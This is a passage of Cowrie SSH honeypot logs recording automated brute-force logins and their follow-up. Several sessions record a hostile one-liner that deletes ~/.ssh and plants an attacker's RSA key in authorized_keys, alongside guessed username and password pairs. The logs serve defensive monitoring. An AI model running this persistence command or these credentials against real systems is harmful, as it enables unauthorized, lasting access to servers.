AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:24:17.086952Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:24:17.506484Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:17.507425Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59009,"dst_ip":"1.2.3.4","dst_port":22,"session":"178b52ce263b","protocol":"ssh","message":"New connection: 212.227.235.229:59009 (1.2.3.4:22) [session: 178b52ce263b]","sensor":"my-vps","timestamp":"2025-09-09T06:24:17.949656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:24:18.085334Z","src_ip":"212.227.235.229","session":"178b52ce263b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:24:18.432494Z","src_ip":"212.227.235.229","session":"178b52ce263b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:24:20.034303Z","src_ip":"212.227.235.229","session":"178b52ce263b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:21.373957Z","src_ip":"212.227.235.229","session":"178b52ce263b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59619,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fe34e9f1485","protocol":"ssh","message":"New connection: 212.227.235.229:59619 (1.2.3.4:22) [session: 1fe34e9f1485]","sensor":"my-vps","timestamp":"2025-09-09T06:24:21.713348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:24:21.714271Z","src_ip":"212.227.235.229","session":"1fe34e9f1485"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:24:22.080973Z","src_ip":"212.227.235.229","session":"1fe34e9f1485"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:24:23.503586Z","src_ip":"212.227.235.229","session":"1fe34e9f1485"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:23.868874Z","src_ip":"212.227.235.229","session":"1fe34e9f1485"}
{"eventid":"cowrie.session.closed","duration":"10.9","message":"Connection lost after 10.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:23.870135Z","src_ip":"212.227.235.229","session":"a29c13f68f57"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":36800,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b015a29f9f8","protocol":"ssh","message":"New connection: 118.26.39.178:36800 (1.2.3.4:22) [session: 7b015a29f9f8]","sensor":"my-vps","timestamp":"2025-09-09T06:24:24.253273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:24:24.254036Z","src_ip":"118.26.39.178","session":"7b015a29f9f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:24:24.453454Z","src_ip":"118.26.39.178","session":"7b015a29f9f8"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps@2025","message":"login attempt [apps/apps@2025] failed","sensor":"my-vps","timestamp":"2025-09-09T06:24:25.293364Z","src_ip":"118.26.39.178","session":"7b015a29f9f8"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:26.495101Z","src_ip":"118.26.39.178","session":"7b015a29f9f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56962,"dst_ip":"1.2.3.4","dst_port":22,"session":"e34835b2e61e","protocol":"ssh","message":"New connection: 212.227.235.229:56962 (1.2.3.4:22) [session: e34835b2e61e]","sensor":"my-vps","timestamp":"2025-09-09T06:24:35.738543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:24:35.739462Z","src_ip":"212.227.235.229","session":"e34835b2e61e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:24:35.981847Z","src_ip":"212.227.235.229","session":"e34835b2e61e"}
{"eventid":"cowrie.login.failed","username":"vpnuser","password":"password","message":"login attempt [vpnuser/password] failed","sensor":"my-vps","timestamp":"2025-09-09T06:24:36.988577Z","src_ip":"212.227.235.229","session":"e34835b2e61e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:38.233189Z","src_ip":"212.227.235.229","session":"e34835b2e61e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35000,"dst_ip":"1.2.3.4","dst_port":22,"session":"acd241302671","protocol":"ssh","message":"New connection: 212.227.235.229:35000 (1.2.3.4:22) [session: acd241302671]","sensor":"my-vps","timestamp":"2025-09-09T06:24:43.235200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:24:43.236533Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:24:43.609388Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.login.success","username":"root","password":"shenhua","message":"login attempt [root/shenhua] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:24:45.050753Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:24:45.819096Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:24:45.819794Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:24:45.820888Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:46.555007Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:24:46.928971Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:24:46.929712Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:24:47.406436Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:47.407483Z","src_ip":"212.227.235.229","session":"acd241302671"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35872,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf4608dd7075","protocol":"ssh","message":"New connection: 212.227.235.229:35872 (1.2.3.4:22) [session: cf4608dd7075]","sensor":"my-vps","timestamp":"2025-09-09T06:24:47.755828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:24:47.756606Z","src_ip":"212.227.235.229","session":"cf4608dd7075"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:24:48.115355Z","src_ip":"212.227.235.229","session":"cf4608dd7075"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:24:49.647495Z","src_ip":"212.227.235.229","session":"cf4608dd7075"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53683,"dst_ip":"1.2.3.4","dst_port":22,"session":"d57aa5788e4f","protocol":"ssh","message":"New connection: 212.227.235.229:53683 (1.2.3.4:22) [session: d57aa5788e4f]","sensor":"my-vps","timestamp":"2025-09-09T06:24:49.662918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:24:49.663568Z","src_ip":"212.227.235.229","session":"d57aa5788e4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:24:49.774231Z","src_ip":"212.227.235.229","session":"d57aa5788e4f"}
{"eventid":"cowrie.login.failed","username":"minecraft","password":"0","message":"login attempt [minecraft/0] failed","sensor":"my-vps","timestamp":"2025-09-09T06:24:50.259260Z","src_ip":"212.227.235.229","session":"d57aa5788e4f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:51.045044Z","src_ip":"212.227.235.229","session":"cf4608dd7075"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:24:51.372902Z","src_ip":"212.227.235.229","session":"d57aa5788e4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36923,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a239adf1b11","protocol":"ssh","message":"New connection: 212.227.235.229:36923 (1.2.3.4:22) [session: 7a239adf1b11]","sensor":"my-vps","timestamp":"2025-09-09T06:24:51.419922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:24:51.426592Z","src_ip":"212.227.235.229","session":"7a239adf1b11"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:24:51.840410Z","src_ip":"212.227.235.229","session":"7a239adf1b11"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:24:53.514120Z","src_ip":"212.227.235.229","session":"7a239adf1b11"}
